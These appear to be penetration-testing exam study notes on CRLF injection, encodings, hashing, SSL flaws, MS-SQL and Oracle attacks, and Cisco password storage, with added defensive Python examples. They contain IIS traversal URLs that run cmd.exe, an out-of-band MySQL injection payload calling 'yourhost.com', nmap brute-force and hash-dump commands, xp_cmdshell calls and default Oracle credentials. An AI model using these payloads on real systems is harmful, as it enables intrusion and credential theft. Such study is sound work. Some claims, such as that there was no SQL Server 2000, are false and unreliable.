In Windows both a CR and an LF are required to mark the end of a line, whereas in Linux/UNIX only an LF is required. In
the HTTP protocol, the CR-LF sequence is always used to terminate a line.
Often used for cache poisoning or XSS. Some web apps use user input to generate headers for their response,
such as the selected language. If the application does not filter input, a user can set language=english%0d%0a, at which
point a new line is created in the response, or use it to place an XSS payload in the response.
Location and Set-Cookie are the most likely headers for this attack.
In a CRLF injection attack the attacker inserts both the carriage return and line feed characters into user
input to trick the server, web application or the user into thinking that an object is terminated and another one has
started.
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
%0d and %0a is the url encoded form of CR and LF.
Therefore, the log entries would look like this after the attacker inserted those characters and the application
displays it:
IP - Time - Visited Path
123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
By exploiting a CRLF injection vulnerability the attacker can fake entries in the log file to obfuscate his own malicious
actions.
HTTP Smuggling – Using CRLF to bypass application firewalls by splitting the request up; not a vulnerability in the
application but in the application firewall.
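Both CRLF problems above (a header built from a request parameter, and a log line forged with %0d%0a) have the same fix: decode once, then refuse or escape the line terminators. This is an added example, not from the original notes; the header and log formats and the sample request are constructed for it, using the forged log entry shown above as input.

```python
import re
from urllib.parse import unquote

CRLF_RE = re.compile(r"[\r\n]")


class HeaderInjection(ValueError):
    """Raised when a value destined for a response header carries CR or LF."""


def safe_header_value(raw_param):
    """Decode the request parameter once, then refuse CR/LF before it reaches a header."""
    value = unquote(raw_param)
    if CRLF_RE.search(value):
        raise HeaderInjection("CR/LF in header value: %r" % value)
    return value


def is_header_safe(raw_param):
    try:
        safe_header_value(raw_param)
        return True
    except HeaderInjection:
        return False


def set_language_header(raw_param):
    """The 'select language' header from the notes, built only from a checked value."""
    return "Content-Language: " + safe_header_value(raw_param)


def log_safe(field):
    """Escape control characters so one request cannot forge a second log line."""
    return field.replace("\\", "\\\\").replace("\r", "\\r").replace("\n", "\\n")


def log_line(ip, time, raw_path):
    """Write the 'IP - Time - Visited Path' record with every field escaped."""
    return " - ".join(log_safe(x) for x in (ip, time, unquote(raw_path)))


if __name__ == "__main__":
    # Constructed request values in the shape of the notes' examples.
    forged = "/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit"
    print(log_line("123.123.123.123", "08:15", forged))
    print(set_language_header("english"))
    print("header with %0d%0a accepted?", is_header_safe("english%0d%0aSet-Cookie:%20x=1"))
```

The log record stays a single line, with the injected terminator visible as the two characters \r\n, so the reviewer can still see that an injection was attempted rather than being shown a clean-looking second entry from 127.0.0.1.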
H11 - Session Handling
Common pitfalls associated with the design and implementation of session handling mechanisms.
 Cookies – XSS, Transport: Session Cookie restricted to Secure Channel
 HTTP itself is a stateless protocol, and session management enables the application to uniquely identify a
given user across a number of different requests and to handle the data that it accumulates about the state
of that user's interaction with the application.
 Session tokens should only be stored in non-persistent cookies.
 Generation of Cookie values for session – predictable?
H12 - Encryption
Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
PGP: To encrypt data, PGP generates a symmetric key to encrypt data which is protected by the asymmetric key.
PGP can be used to send messages confidentially. For this, PGP combines symmetric-key encryption and public-key
encryption. The message is encrypted using a symmetric encryption algorithm, which requires a symmetric key. Each
symmetric key is used only once and is also called a session key. The message and its session key are sent to the
receiver. The session key must be sent to the receiver so they know how to decrypt the message, but to protect it
during transmission it is encrypted with the receiver's public key. Only the private key belonging to the receiver can
decrypt the session key.
RC algorithm: The RC algorithms are a set of symmetric-key encryption algorithms invented by Ron Rivest. Despite
the similarity in their names, the algorithms are for the most part unrelated. There have been six RC algorithms so
far.
Common Symmetric Encryption Algorithms: AES (Advanced Encryption Standard), Blowfish, DES (Data Encryption
Standard), Triple DES, Serpent, Twofish, RC.
Common Asymmetric Encryption Algorithms: RSA, ECC, DSA.
MD5 – Salted: hash(pass+salt) - When a user picks or is assigned a password, it is encoded with a randomly
generated value called the salt. This means that any particular password could be stored in 4096 different ways. The
salt value is then stored with the encoded password.
When a user logs in and supplies a password, the salt is first retrieved from the stored encoded password. Salting
protects against:
 rainbow tables (pre-calculated hashes)
 dictionary attacks (often included in the above)
 finding identical passwords if you crack one (without salt everybody that has password as their password will
have same hash)
Contents of /etc/shadow:
[root@slashroot1 ~]# cat /etc/shadow
root:$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1:15651:0:99999:7:::
The first field is a number that tells you the hashing algorithm being used:
$1 = MD5
$2 = Blowfish
$2a = eksblowfish
$5 = SHA-256
$6 = SHA-512
The second field is the salt value, and the last field is the hash of salt+user password.
The salt value is Etg2ExUZ. You can reproduce the same output by providing the salt value Etg2ExUZ and the original
password.
[root@slashroot1 ~]# openssl passwd -1 -salt Etg2ExUZ redhat
$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1
[root@slashroot1 ~]#
You can see that the encoded entry can only be reproduced with the exact same salt value (which is always
randomly selected by the password program).
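As an added example (not from the original notes), here is the shadow-field structure above parsed programmatically, together with a minimal salt-then-hash store and verifier. The parser handles the three-segment $id$salt$hash form shown on the page; the hashing scheme (SHA-256 over salt+password under a made-up "$x$" identifier) is constructed purely to illustrate why a per-user salt matters and is not the MD5-crypt algorithm that produced the page's $1$ hash.

```python
import hashlib
import hmac
import secrets

# Identifiers from the notes' table.
CRYPT_IDS = {"1": "MD5", "2": "Blowfish", "2a": "eksblowfish", "5": "SHA-256", "6": "SHA-512"}


def parse_crypt_field(field):
    """Split a /etc/shadow password field '$id$salt$hash' into (algorithm, salt, hash)."""
    parts = field.split("$")
    if len(parts) != 4 or parts[0] != "":
        raise ValueError("not a $id$salt$hash field: %r" % field)
    _, ident, salt, digest = parts
    return CRYPT_IDS.get(ident, "unknown(%s)" % ident), salt, digest


def make_salted_hash(password, salt=None):
    """Constructed scheme for illustration: sha256(salt + password), stored with its salt."""
    salt = salt or secrets.token_hex(8)          # fresh random salt per password
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return "$x$" + salt + "$" + digest


def verify(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, ident, salt, digest = stored.split("$")
    if ident != "x":
        raise ValueError("unsupported scheme %r" % ident)
    candidate = hashlib.sha256((salt + password).encode()).hexdigest()
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print(parse_crypt_field("$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1"))   # the line from the notes
    a = make_salted_hash("password")
    b = make_salted_hash("password")
    print("same password, different salts, different hashes:", a != b)
    print("verify correct:", verify("password", a), " verify wrong:", verify("wrong", a))
```

Two users with the password "password" get different stored values, which is the point made above about identical passwords. A real password store should use a deliberately slow function (bcrypt, scrypt, Argon2 or the SHA-512-crypt behind $6$) rather than a single SHA-256 round; the salt alone does nothing against a fast brute force of one hash.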
Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic
values (e.g. MD5 hashes)
Base64
 Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string
format by translating it into a radix-64 representation. The term Base64 originates from a specific MIME
content transfer encoding.
 Each base64 digit represents exactly 6 bits of data. Three 8-bit bytes (i.e., a total of 24 bits) can therefore be
represented by four 6-bit base64 digits.
 Base64 is not encryption -- it's an encoding. It's a way of representing binary data using only printable (text)
characters.
 While encoding the user name and password with the Base64 algorithm typically makes them unreadable by
the naked eye, they are as easily decoded as they are encoded. Security is not the intent of the encoding
step. Rather, the intent of the encoding is to encode non-HTTP-compatible characters that may be in the
user name or password into those that are HTTP-compatible.
 Example of Base64:
TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
 The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was
initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive
vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional
corruption.
 Like most hash functions, MD5 is neither encryption nor encoding. It can be cracked by brute-force attack
and suffers from extensive vulnerabilities.
 The 128-bit (16-byte) MD5 hashes (also termed message digests) are typically represented as a sequence of
32 hexadecimal digits. The following demonstrates a 43-byte ASCII input and the corresponding MD5 hash:
 MD5("The quick brown fox jumps over the lazy dog") =
9e107d9d372bb6826bd81d3542a419d6
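Identifying and decoding the two kinds of value above (Base64 and hex digests) as an added example, not from the original notes. It decodes the Base64 sample given above and labels a hex string by its digest length; the heuristics and the helper names are constructed for the example, and length alone cannot distinguish MD5 from other 128-bit digests such as NTLM, so the label says so.

```python
import base64
import binascii
import hashlib
import re

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
# Hex length -> digest family. 32 hex chars is 128 bits: MD5, but also MD4/NTLM.
DIGEST_LENGTHS = {32: "MD5 (or MD4/NTLM)", 40: "SHA-1", 56: "SHA-224",
                  64: "SHA-256", 96: "SHA-384", 128: "SHA-512"}


def try_base64(value):
    """Return the decoded text if value is strict Base64 that decodes to printable
    text, else None. Line breaks inside the value are tolerated (MIME wrapping)."""
    compact = "".join(value.split())
    if len(compact) % 4 or not B64_RE.match(compact):
        return None
    try:
        text = base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def identify_hex_digest(value):
    """Label a hex string by digest length; None if it is not hex at all."""
    if not HEX_RE.match(value):
        return None
    return DIGEST_LENGTHS.get(len(value), "hex, but not a common digest length")


def md5_hex(text):
    """Reproduce the notes' MD5 example (for checksums only, not for passwords)."""
    return hashlib.md5(text.encode()).hexdigest()


# The Base64 sample from the notes, wrapped as MIME would wrap it.
SAMPLE_B64 = """TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4="""

if __name__ == "__main__":
    print(try_base64(SAMPLE_B64))
    # Constructed Basic-auth style value: user:password, Base64-encoded.
    print(try_base64("QWxhZGRpbjpvcGVuIHNlc2FtZQ=="))
    print(identify_hex_digest(md5_hex("The quick brown fox jumps over the lazy dog")))
```

A hex string that happens to be 32 characters long is only a hint; confirming that a value is an MD5 of something still means hashing a candidate and comparing, which is exactly why unsalted MD5 password hashes are weak.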
Percent Encoding
Used in URL encoding. Reserved characters have special meanings in the context of URLs and must be encoded into
another form, which is the percent-encoded form to avoid any sort of ambiguity.
A classic example of such ambiguity can be /, which is used to separate paths in a URL, so if the necessity arises to
transmit the / character in a URL then we must encode it accordingly, so that the receiver or parser of the URL does
not get confused and parse the URL incorrectly. Therefore, in that case / is encoded into %2F, this will be decoded
into / by the URL parser.
. = %2E (ASCII – as an unrestricted character) \ = %5C / = %2F : = %3A < = %3c > = %3e
It is also possible to encode unrestricted characters by providing an equivalent ASCII hexadecimal code for the character,
preceded by %. For example, if we had to encode A into percent encoding, we can simply provide %41; here, 41 is the
hexadecimal for 65, which, in turn, is the ASCII code for capital A. Lowercase a is %61.
Double Percent Encoding
Double percent encoding is the same as percent encoding with a twist that each character is encoded twice instead of
once.
%25 is added, therefore if double encoding / , then it’ll be %252F
IIS 5.0 directory traversal code execution – CVE-2001-0333
Normal URL:
http://example.com/scripts/../../winnt/system32/cmd.exe?/c+dir+c:
Double-encoded URL:
http://example.com/scripts/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:
http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
Unicode Attack
The double-decode value %255c can be substituted for a variety of Unicode representations of the \ or / characters,
such as %c0%af, %c1%9c, %c1%pc, %c0%qf, %c1%8s, %c1%1c, %c1%af, and %e0%80%af. The choice of a
successful Unicode representation of \ and / depends upon the language character set installed and running on the
host.
http://TARGET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
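The defender's view of the three URL forms above (plain, double-encoded, overlong UTF-8), as an added example that is not from the original notes: decode until the path stops changing, then look for traversal and for bytes that are not valid UTF-8. It generalises the IIS case to any percent-encoded path; the function and its result keys are constructed for the example, and Python's strict UTF-8 decoder is what rejects overlong forms such as %c0%af.

```python
from urllib.parse import unquote_to_bytes


def canonicalize(path, max_rounds=5):
    """Percent-decode repeatedly until the path stops changing, then inspect it.

    Returns the fully decoded path, how many decoding rounds changed it
    (2 or more means double encoding), whether a '..' segment appeared, and
    whether the decoded bytes were not valid UTF-8 (overlong sequences).
    """
    current = path
    rounds = 0
    bad_utf8 = False
    for _ in range(max_rounds):
        raw = unquote_to_bytes(current)
        try:
            decoded = raw.decode("utf-8")
        except UnicodeDecodeError:
            bad_utf8 = True
            decoded = raw.decode("latin-1")     # keep going, but remember it was malformed
        if decoded == current:
            break
        current = decoded
        rounds += 1
    normalized = current.replace("\\", "/")     # IIS accepts either separator
    traversal = ".." in normalized.split("/")
    return {
        "path": normalized,
        "rounds": rounds,
        "traversal": traversal,
        "bad_utf8": bad_utf8,
        "suspicious": traversal or bad_utf8 or rounds >= 2,
    }


if __name__ == "__main__":
    # Constructed request paths in the shape of the three URLs above.
    for p in ["/scripts/../../winnt/system32/cmd.exe",
              "/scripts/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe",
              "/scripts/..%255c..%255cwinnt/system32/cmd.exe",
              "/scripts/..%c0%af../winnt/system32/cmd.exe",
              "/images/logo.png"]:
        print(canonicalize(p))
```

The lesson behind CVE-2001-0333 is ordering: IIS checked the path for traversal before the second decode, so the check ran on a still-encoded string. Decoding to a fixed point first, and rejecting anything that needed more than one round or was not valid UTF-8, makes the check see what the file system will see.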
Encryption transforms data (plain-text) into another format in such a way that only specific individuals can reverse
the transformation (using a cipher). Encryption is for maintaining data confidentiality, and thus the ability to reverse
the transformation (the keys) is limited to certain people. Encryption applies a transformation to a piece of data that
can only be reversed with specific (and secret) knowledge of how to decrypt it.
Identification of common SSL vulnerabilities
 POODLE (CVE-2014-3566) - The Padding Oracle on Downgraded Legacy Encryption (POODLE) attack was
published in October 2014 and takes advantage of two factors. The first is the fact that some servers/clients
still support SSL 3.0 for interoperability and compatibility with legacy systems, and the second factor is a
vulnerability that exists in SSL v3.0 which is related to Block Padding.
 The Client initiates the Handshake and sends the list of the supported SSL/TLS versions. An attacker
intercepts the traffic, performing a Man-in-The-Middle (MiTM) attack, and impersonates the Server until the
Client agrees to downgrade the connection to the vulnerable SSL 3.0.
 BEAST (CVE-2011-3389) - The Browser Exploit Against SSL/TLS attack was published in September 2011 and
affects SSL 3.0 and TLS 1.0. An attacker can "decrypt" data exchanged between two parties by taking
advantage of a vulnerability in the implementation of the Cipher Block Chaining (CBC) mode in TLS 1.0, which
allows them to perform a chosen-plaintext attack.
H13 - Source Code Review
The first step is to mirror the remote server to your local system, using GNU Wget. Sam Spade can be used to identify hidden
fields and email addresses.
Common techniques for identifying and reviewing deficiencies in the areas of security.
 Black box (automated) and White box (manual) testing. Static and Dynamic testing.
Define scope: which vulnerabilities you need to look for, such as the OWASP Top 10, SANS, etc. Try to review as
many of them as possible, if not all of them. Then deduce how many of them can be detected using tools and which
are best suited for manual review.
Categorize the vulnerabilities: what is your priority? The following are a few categories you can look at:
 Authorization
 Authentication
 Injection flaws
 Improper error handling/Exception flaws
 Encryption (Cryptography)
 Auditing and Logging
 Session related flaws (Session management)
 Insecure configuration
 Distrust User Input
Appendix J: Databases
MS-SQL 1433/TCP
MS-SQL-SSRA 1434/UDP
MS-SQL-HIDDEN 2433/TCP
ORACLE-TNS 1521/TCP
ORACLE-TNS-ALT 1526/TCP
ORACLE-TNS-ALT 1541/TCP
MYSQL 3306/TCP
J1 - Microsoft SQL Server
Knowledge of common attack vectors for Microsoft SQL Server.
nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info x.x.x.x
nmap -p1433 --script ms-sql-brute --script-args userdb=/root/user.txt,passdb=/root/pass.txt x.x.x.x
SA account and default DBs
MS SQL Server 2008 (and 2005) contain five special databases:
master, model, tempdb, msdb, and mssqlsystemresource (aka Resource)
Nessus Finding:
The remote instance of MS SQL / SQL Server has the default 'sa' account enabled without any
password.
C:\MSSQL7
EXEC sp_password NULL, 'password', 'sa'
go
exit
SQL Server 7.0 was released in 1998 - the last edition with a blank SA password and xp_cmdshell enabled by default. Note
there is no SQL 2000! The next versions were SQL Server 2005, 2008, 2017.
Understanding of privilege escalation and attack techniques for a system compromised via database connections.
xp_cmdshell (not xp_cmd_shell) - Disabled in 2005 and 2008 by default (hence only enabled in SQL 7)
Hidden Port: 2433 TCP
EXEC xp_cmdshell 'dir *.exe'; -- Exec not run…
GO
Get version: @@VERSION
Load file:
SELECT * FROM OPENROWSET(BULK 'C:\Temp\DJ1885.txt', FORMATFILE='C:\Temp\DJ1885.fmt') AS Test
 Reading Registry - EXEC (or is it Exec?) master..xp_regread 'hKey','Key Name','String Value',@outvar OUTPUT
 Writing Registry - EXEC master..xp_regwrite 'hKey','Key Name','String Value','Data type','Value to write'
(Exam: can regwrite be used for privilege escalation?)
 Deleting Registry String - EXEC master..xp_regdeletevalue 'hKey','Key Name','String Value'
J2 - Oracle RDBMS
Get Oracle version: SELECT * FROM V$VERSION or SELECT version FROM V$INSTANCE
SID - The Oracle SID is the unique name that identifies your instance/database (database name + instance
number). If your database name is somedb and your instance number is 3, then your SID is somedb3.
TNS - Transparent Network Substrate (TNS) is the network protocol used by Oracle for connectivity to Oracle
Databases. The Oracle Database Listener is the server process that provides basic network connectivity for clients,
application servers, and other databases to an Oracle database.
When enumerating Oracle, the first step is to talk to the TNS-Listener that usually resides on the default port
(1521/TCP).
$ ./tnscmd.pl status -h 192.168.0.2
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.0.2:1521
writing 89 bytes
reading
. .......6.........E.
...........O........(DESCRIPTION=(TMP=)(VSNNUM=153093376)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)
(VERSION=TNSLSNR for 32-bit Windows: Version 10.2.0.5.0 - Production)(START_DATE=30-MAY-2007
02:00:25)
In the above example we have discovered an Oracle 10g database. Once we have access to the listener, the next step
is to enumerate the SID.
There are a number of tools (Kali, Nmap scripts) to brute-force the SID; once you have it, the next step is account
enumeration. Review the default usernames and passwords.
Derivation of version and patch information from hosts running Oracle software.
nmap x.x.x.x -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt
TNS listener on TCP 1521 (sometimes 1526,1541).
msf > use auxiliary/admin/oracle/tnscmd
Or use tnscmd.pl (stored under /Files and Software - remember to take for CREST lab)
perl tnscmd.pl -h 192.168.0.13 (default command = ping)
perl tnscmd.pl version -h 192.168.0.13 -- VSNNUM=186647040
VSNNUM=135294976 – convert decimal to hex (Windows Calc, Programmer mode): 810 7000, hence
version 8.1.7 (the zeros seem to be ignored: the hex is 8107000, and in the book it is written as 08107000)
[oracle@DCG023 8828328]$ opatch lsinventory
perl tnscmd.pl status -h 192.168.0.13
A better approach is the NSE script: nmap --script=oracle-sid-brute -p 1521 x.x.x.x - which correctly returns the SID,
here XE, i.e. Oracle XE (Express Edition):
| oracle-sid-brute:
|_ XE
...then having got the SID:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=XE 192.168.0.13 - this will check common
accounts; specify your own lists as below:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=XE,userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.13
Default Oracle accounts.
perfstat:perfstat => Valid credentials
| scott:tiger => Valid credentials (Source)
Oracle Database installs with several default database user accounts.
Upon successful installation of the database, the Database Configuration Assistant automatically locks and expires
most default database user accounts. However, if you performed a manual installation, then no default database
users are locked upon successful installation of the database server. Or, if you have upgraded from a previous
release of Oracle Database, you may have default accounts from earlier releases.
If you install Oracle Enterprise Manager, the SYSMAN and DBSNMP accounts are open, unless you configure Oracle
Enterprise Manager for central administration. In this case, the SYSMAN account (if present) will be locked.
If you do not install Oracle Enterprise Manager, then only the SYS and SYSTEM accounts are open. Database
Configuration Assistant locks and expires all other accounts (including SYSMAN and DBSNMP).
The default accounts that are created when you create a database are the HR, OE, and SCOTT accounts.
Default Usernames and Passwords
ANONYMOUS ANONYMOUS
CTXSYS CTXSYS
DBSNMP DBSNMP
LBACSYS LBACSYS
MDSYS MDSYS
ORDPLUGINS ORDPLUGINS
ORDSYS ORDSYS
OUTLN OUTLN
WKSYS WKSYS
WMSYS WMSYS
OLAPSYS MANAGER
SCOTT TIGER
SYSMAN OEM_TEMP
SYSTEM MANAGER
SYS CHANGE_ON_INSTALL
XDB CHANGE_ON_INSTALL
Oracle Port Filtering – Valid Node Checking (VNC)
Oracle Database Listener allows for filtering of Oracle DB connections through the Valid Node Checking (VNC)
feature.
The Oracle database Listener validates the IP address (or host name) of the incoming client machine against the
“allow” or “deny” rules specified in the sqlnet.ora file before opening up a connection to the database.
This feature has been available since Oracle8. Specify permitted IPs through tcp.invited_nodes or deny
rules through tcp.excluded_nodes.
Beginning with Oracle 11g R2, allow and deny rules can include wildcards and CIDR notation.
tcp.validnode_checking = YES
tcp.excluded_nodes = {list of IP addresses}
tcp.invited_nodes = {list of IP addresses}
MySQL
Get version: select version();
Load file: select load_file("/etc/passwd");
?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('',({INJECTION}), 'yourhost.com')))
J3 - Web / App / Database Connectivity
Common databases (Oracle, MySQL and Access) and the connection and authentication methods used by web
applications.
MSSQL
SQL Server authentication
 ODBC
 ActiveX Data Objects (ADO) connection string
Windows NT authentication
 Basic authentication must be enabled for the Web application.
Oracle
 Web applications access a data source using a connection, and a DataSource object can be thought of as a
factory for connections to the particular data source that the DataSource instance represents.
 The OCI8 extension provides three different functions for connecting to Oracle. The standard connection
function is oci_connect(). This creates a connection to an Oracle database and returns a resource used by
subsequent database calls.
 PHP provides Oracle OCI8 functions. Other options are PDO with the Oracle driver and (if Oracle supports it)
ODBC.
Misc.
Daytime Protocol
The Daytime Protocol – TCP and UDP 13 (based on RFC, but Wikipedia says just UDP 13)
A host may connect to a server that supports the Daytime Protocol on either Transmission Control Protocol (TCP) or
User Datagram Protocol (UDP) port 13. The server returns an ASCII character string of the current date and time in
an unspecified format.
Output: Monday, February 22, 1982 18:45:59-PST
Time Protocol
The Time Protocol provides a site-independent, machine readable date and time. A host connects to a server that
supports the Time Protocol on port 37 (TCP or UDP).
The server then sends the time as a 32-bit unsigned integer in binary format and in network byte order, representing
the number of seconds since 00:00 (midnight) 1 January, 1900 GMT, and closes the connection. Operation over UDP
requires the sending of any datagram to the server port, as there is no connection setup for UDP.
Many Unix-like operating systems used the Time Protocol to monitor or synchronize their clocks using the rdate
utility, but this function was superseded by the Network Time Protocol (NTP) and the corresponding ntpdate utility.
NTP is more sophisticated in various ways, among them that its resolution is finer than one second.
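As an added example (not part of the original notes), the Time Protocol reply format described above in Python: decoding the 4-byte big-endian value, converting it to a Unix timestamp, and a client that works over TCP or UDP. The 4-byte sample reply is constructed by hand, and fetch_time() is only needed when there is a live server to query.

```python
"""Decode and fetch Time Protocol (port 37) replies.

Added example, not code from the original notes. SAMPLE_REPLY is a
constructed value, not a capture from a real server.
"""
import socket
import struct
from datetime import datetime, timedelta, timezone

TIME_EPOCH = datetime(1900, 1, 1, tzinfo=timezone.utc)
# Seconds between the Time Protocol epoch (1900) and the Unix epoch (1970).
UNIX_OFFSET = 2208988800


def decode_time_reply(payload: bytes) -> datetime:
    """Turn the 4-byte reply into an aware UTC datetime.

    Anything other than exactly four bytes is rejected: a short or padded
    reply is more likely a different service (or noise) on port 37.
    """
    if len(payload) != 4:
        raise ValueError(f"expected 4 bytes, got {len(payload)}")
    (seconds,) = struct.unpack("!I", payload)   # '!' = network byte order, unsigned
    return TIME_EPOCH + timedelta(seconds=seconds)


def to_unix_seconds(payload: bytes) -> int:
    """Convert the reply to a Unix timestamp (negative for dates before 1970)."""
    (seconds,) = struct.unpack("!I", payload)
    return seconds - UNIX_OFFSET


def encode_time_reply(when: datetime) -> bytes:
    """Inverse of decode_time_reply; useful for building test fixtures."""
    seconds = int((when - TIME_EPOCH).total_seconds())
    if not 0 <= seconds <= 0xFFFFFFFF:
        raise ValueError("outside the 32-bit range the protocol can carry")
    return struct.pack("!I", seconds)


def fetch_time(host: str, port: int = 37, use_udp: bool = False,
               timeout: float = 3.0) -> datetime:
    """Query a Time Protocol server over TCP (default) or UDP.

    Over TCP the server replies as soon as the connection is made and then
    closes it; over UDP any datagram triggers the reply, as the notes say.
    """
    if use_udp:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(timeout)
            s.sendto(b"\x00", (host, port))
            payload, _ = s.recvfrom(4)
    else:
        with socket.create_connection((host, port), timeout=timeout) as s:
            payload = b""
            while len(payload) < 4:
                chunk = s.recv(4 - len(payload))
                if not chunk:
                    break
                payload += chunk
    return decode_time_reply(payload)


# Constructed sample: 0x83AA7E80 = 2208988800 = 1970-01-01T00:00:00Z
SAMPLE_REPLY = b"\x83\xaa\x7e\x80"

if __name__ == "__main__":
    print(decode_time_reply(SAMPLE_REPLY).isoformat())
    print(to_unix_seconds(SAMPLE_REPLY))
```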
Cisco Config Password Storage
Cisco: We recommend that you use the enable secret command (do not use enable password) because it uses an
improved encryption algorithm. If you configure the enable secret command, it takes precedence over the enable
password command; the two commands cannot be in effect simultaneously.
To determine which scheme has been used to encrypt a specific password, check the digit preceding the encrypted
string in the configuration file. If that digit is a 7, the password has been encrypted using the weak algorithm. If the
digit is a 5, the password has been hashed using the stronger MD5 algorithm.
enable password xxxxxxx stores password in clear text (type 0)
enable password combined with service password-encryption requires someone looking over your shoulder to
memorize a slightly harder phrase long enough to Google "crack type 7 password".
#enable
#configure terminal
(config)#enable secret produces a hash (it does not encrypt)
For example, in the configuration command (note the $1 for the MD5 hash and $iUjJ for the salt):
#show running-config | include enable
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP
Note the password is already hashed in MD5 format by the above command; this is just showing the running config.
The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
the password has been encrypted using the weak reversible algorithm.
Type 0 - The password will not be hashed when router stores it in Run/Start Files
enable password cisco123
Type 4 - The password will be hashed when the router stores it in run/start files using SHA-256. This type is deprecated
starting from IOS 15.3(3)
enable secret 4 Rv4kArhts7yA2xd8BD2YTVbts
Type 5 - The password will be hashed when the router stores it in run/start files using MD5
enable secret 5 00271A5307542A02D22842
Type 7 - The password will be encrypted when the router stores it in run/start files using a Vigenère cipher,
which any website with a type 7 reverser can crack in less than one second <- AVOID
ena password cisco123
service password-encryption
In newer versions of Cisco's IOS, there are now Type 8 and Type 9 passwords. These are much more secure.
Type 8 - The password will be hashed in run/start files using PBKDF2-SHA-256, starting from IOS 15.3(3):
Password-Based Key Derivation Function 2 (PBKDF2) with the 256-bit Secure Hash Algorithm (SHA-256) as the hashing
algorithm
R1(config)#enable algorithm-type sha256 secret cisco
R1(config)#do sh run | i enable
enable secret 8 $8$mTj4RZG8N9ZDOk$elY/asfm8kD3iDmkBe3hD2r4xcA/0oWS5V3os.O91u.
Type 9 - The password will be hashed in Run/Start Files using scrypt as the hashing algorithm starting from IOS
15.3(3)
R1(config)#ena algorithm-type scrypt secret cisco
R1(config)#do sh run | i enable
enable secret 9 $9$WnArItcQHW/uuE$x5WTLbu7PbzGDuv0fSwGKS/KURsy5a3WCQckmJp0MbE
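As an added example (not from the original notes), a Python script that audits a running-config for the storage types described above, flagging type 0 and type 7 (and the deprecated type 4) and confirming whether service password-encryption is set. The sample configuration is constructed for the example, reusing the type 5, 7 and 9 strings shown in the notes; the algorithm-type scrypt remediation form is the one shown above for enable and is assumed to apply to username lines as well.

```python
"""Audit credential storage types in a Cisco IOS running-config.

Added example, not code from the original notes. SAMPLE_CONFIG is
constructed for the example, reusing the type 5, 7 and 9 strings shown
in the notes above.
"""
import re

# Storage type -> (what it is, how a reviewer should rate it), per the notes.
TYPE_INFO = {
    0: ("clear text", "critical"),
    4: ("SHA-256, deprecated since IOS 15.3(3)", "high"),
    5: ("salted MD5 hash", "medium"),
    7: ("Vigenere-style reversible encryption", "critical"),
    8: ("PBKDF2-SHA-256", "ok"),
    9: ("scrypt", "ok"),
}

# "enable password|secret [type] value" or
# "username NAME [privilege N ...] password|secret [type] value"
CRED_LINE = re.compile(
    r"^\s*(?:(enable)|username\s+(\S+).*?)\s+(password|secret)\s+(?:(\d)\s+)?(\S+)\s*$"
)


def classify(line: str):
    """Return a finding dict for a credential line, or None for other lines.

    A value with no leading type digit is one IOS wrote out in the clear
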